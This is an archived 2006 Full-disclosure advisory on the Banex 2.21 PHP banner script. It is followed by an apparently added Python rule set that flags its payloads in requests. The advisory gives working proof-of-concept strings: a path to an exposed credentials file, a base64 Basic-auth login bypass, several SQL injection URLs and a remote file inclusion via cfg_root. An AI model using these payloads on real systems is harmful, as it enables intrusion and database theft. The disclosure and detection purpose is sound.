
List:       full-disclosure
Subject:    [Full-disclosure] Banex Multiple Vulnerabilities
From:       SirDarckCat <sirdarckcat () gmail ! com>
Date:       2006-07-30 4:42:36
Message-ID: 8ba534860607292142v59450c31l430d65424ca3967b () mail ! gmail ! com

Discovered by Sirdarckcat from elhacker.net

Banex 2.21
http://sourceforge.net/projects/banex
==============================================

Banex is a simple script for sharing banners
across multiple websites.

Anyway, it has multiple vulnerabilities.

==============================================
1.- Sensitive Information Disclosure

PoC:
http://www.server.com/inc/lib.inc

No protection, and it contains the DB name, password and user.

==============================================

2.- SQL injection


PoC:

GET /admin.php HTTP/1.1
Host: www.server.com
Authorization: Basic YWRtaW4nIE9SIDE9MS8qOnA=

==============================================

3.- SQL injection

PoC:
http://www.server.com/signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/*

==============================================

4.- SQL injection **** EVEN WITH MAGIC ON ****

PoC:
GET /admin.php?activatebanner&id=-1%20[SQLi] HTTP/1.1
Host: www.server.com
Authorization: Basic YWRtaW4nIE9SIDE9MS8qOnA=


Same bug, in a SELECT context:
/admin.php?activateuser&id='+[SQL]
/admin.php?deleteunuser&id='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?viewmem&viewmem='+[SQL]
/admin.php?viewmemunb&viewmemunb='+[SQL]
/admin.php?viewunmem&viewunmem='+[SQL]

Same bug, in a DELETE context:
/admin.php?deletebanner&id=-1+[SQL]
/admin.php?activateuser&deleteuser='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]

==============================================

5.- Remote File Inclusion:

PoC:
http://www.server.com/members.php?cfg_root=http://www.google.com/?


==============================================

Regards,
Sirdarckcat
elhacker.net


-- 
Regards,
SirDarckCat@GMail.com

http://www.google.com/search?q=sirdarckcat
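The five PoCs above share a small set of request-level signatures that a reverse proxy or log-review job can match before anything reaches Banex: a direct fetch of an `.inc` file, a quote or comment sequence in the Basic-auth username, a non-numeric `id` on admin.php, and a `cfg_root` parameter carrying a URL. The following inspection rules are an added example, not code from the advisory or from the Banex project; the sample requests, the `rfi.example` host and the finding labels are constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Constructed samples modelled on the advisory's PoCs, not real traffic; "rfi.example" is a placeholder.
SAMPLE_REQUESTS = [
    ("GET", "/inc/lib.inc", {}),
    ("GET", "/admin.php", {"Authorization": "Basic YWRtaW4nIE9SIDE9MS8qOnA="}),
    ("GET", "/admin.php?activatebanner&id=-1%20OR%201=1",
     {"Authorization": "Basic YWRtaW46cA=="}),
    ("GET", "/members.php?cfg_root=http://rfi.example/", {}),
    ("GET", "/admin.php?activatebanner&id=17", {"Authorization": "Basic YWRtaW46cA=="}),
]

SQL_META = re.compile(r"['\"]|/\*|--")                   # quote or comment sequences
URL_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)  # cfg_root pointing off-host

def basic_auth_user(headers):
    """Username from an HTTP Basic Authorization header, or None if absent/invalid."""
    value = headers.get("Authorization", "")
    if not value.lower().startswith("basic "):
        return None
    try:
        decoded = base64.b64decode(value[6:], validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return decoded.split(":", 1)[0]

def inspect_request(method, target, headers):
    """Return the list of finding labels for one request; [] means nothing matched."""
    findings = []
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    if parts.path.endswith(".inc"):                          # 1: include file fetched directly
        findings.append("inc-file-disclosure")
    user = basic_auth_user(headers)
    if user is not None and SQL_META.search(user):           # 2: injection via the auth username
        findings.append("sqli-basic-auth-user")
    if any(not re.fullmatch(r"\d+", v) for v in params.get("id", [])):  # 3/4: non-numeric id
        findings.append("sqli-id-param")
    if any(URL_SCHEME.match(v) for v in params.get("cfg_root", [])):    # 5: remote include
        findings.append("rfi-cfg-root")
    return findings

def inspect_all(requests=SAMPLE_REQUESTS):
    return {target: inspect_request(m, target, h) for m, target, h in requests}

if __name__ == "__main__":
    for target, findings in inspect_all().items():
        print(f"{target:50} {findings or 'clean'}")
```

Only the last sample request comes back clean; the other four each map to exactly one of the advisory's items.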
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
